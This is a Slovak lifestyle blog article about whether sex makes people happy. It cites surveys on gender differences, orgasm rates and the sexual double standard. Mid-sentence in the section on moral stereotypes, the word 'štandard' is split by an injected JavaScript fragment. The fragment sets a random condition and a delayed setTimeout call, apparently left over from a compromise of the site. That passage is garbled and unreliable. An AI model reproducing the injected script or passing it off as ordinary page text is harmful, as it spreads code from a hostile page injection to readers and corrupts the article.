O sexe a šťastí

| január 3, 2021

Niektorí ľudia tvrdia, že šťastie je len faktorom genetiky a že každý z nás ma v našej DNA vštiepený recept na šťastie, či nešťastie. Iní zas trvajú na tom, že to závisí od našich životných okolností, zatiaľ čo ostatní tvrdia, že všetko je to založené na duševnom rozpoložení, a že každý človek je sám sebe takzvaným strojcom vlastného šťastia. 

Nie je šťastie ako šťastie

Ak by ste sa ľudí na ulici opýtali, čo pre nich znamená šťastie alebo, lepšie povedané byť šťastný, mnohí z nich by odpovedali vecami ako je zdravie, láska, úspech, či rodina. Vedci však do mixu pridali ešte kontroverznejší faktor. Sex. Zamysleli ste sa niekedy nad tým, či vás sex robí šťastným? Najnovšia štúdia ukázala niekoľko zaujímavých odpovedí. 

Po opýtaní takmer 1200 recipientov vo vekovom zložení od 15 do 60 rokov sa zistilo, že až 60% mužov si pod slovom “šťastie” predstaví aj sexualný akt. Naopak ženy to vidia trochu inak. Zo 173 recipientov, ktorí by sex zaradili medzi top 5 slov, ktoré inklinujú k ich predstave šťastia bolo len 38 z nich ženského pohlavia. Prečo je to tak?

Medzi mužmi a ženami

Existuje mnoho dôvodov, ktoré by mohli vysvetliť, prečo je menej pravdepodobné, že by ženy spájali sex so šťastím. Podľa inej štúdie, ktorá sa zaoberala aká je pravdepodobnosť dosiahnutia orgazmu zo strany ženy sa zistilo, že u žien je až o 50% menšia šanca orgazmu počas sexu, čo by mohlo vysvetľovať prečo si sex automaticky neasociujú s pocitmi šťastia, ako je to u mužov. Vedci sledovali 24 000 žien vo veku od 20-25 rokov a zistili, že iba 40% počas sexu dosiahlo orgazmus, zatiaľ čo u mužov to bolo až 80%. 

Morálny stereotyp 

Pokiaľ ide o mužov a ženy, sexuálny štandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard má,  bohužiaľ, dvojaký meter. Existuje stigma, ktorá naznačuje, že ženy, ktoré sa zúčastňujú príležitostného sexu sú, jemne povedané, nemorálne. Inými slovami, ženy majú väčšiu pravdepodobnosť poškodenia si svojej sexuálnej reputácie ak si z času na čas doprajú príležitostný sexuálny zážitok. Tieto dôvody spôsobujú, že sex – najmä na jednu noc – je pre ženy rizikovejší pokiaľ ide o morálku, a naviac bez záruky satisfakcie. Naopak u mužov sa dá povedať, že je to úplne naopak: nízke riziko/zaručená spokojnosť. Aj to by mohlo vysvetliť relatívne veľký rozdiel zistený v prieskume. Avšak na druhej strane, v dnešnej modernej spoločnosti sa tieto stereotypy dajú ľahko odbúrať alebo dokonca ignorovať. Každá žena má právo byť sama sebou a robiť svoje vlastné, či už sexuálne alebo morálne rozhodnutia. Hlavne nezabúdajte vždy byť sama sebou a svoje vlastné šťastie hľadať podľa svojich vlastných potrieb či preferencií.

Foto: vogue.com

Tags:

Category: HOMEPAGE, VZŤAHY & SEX

Comments are closed.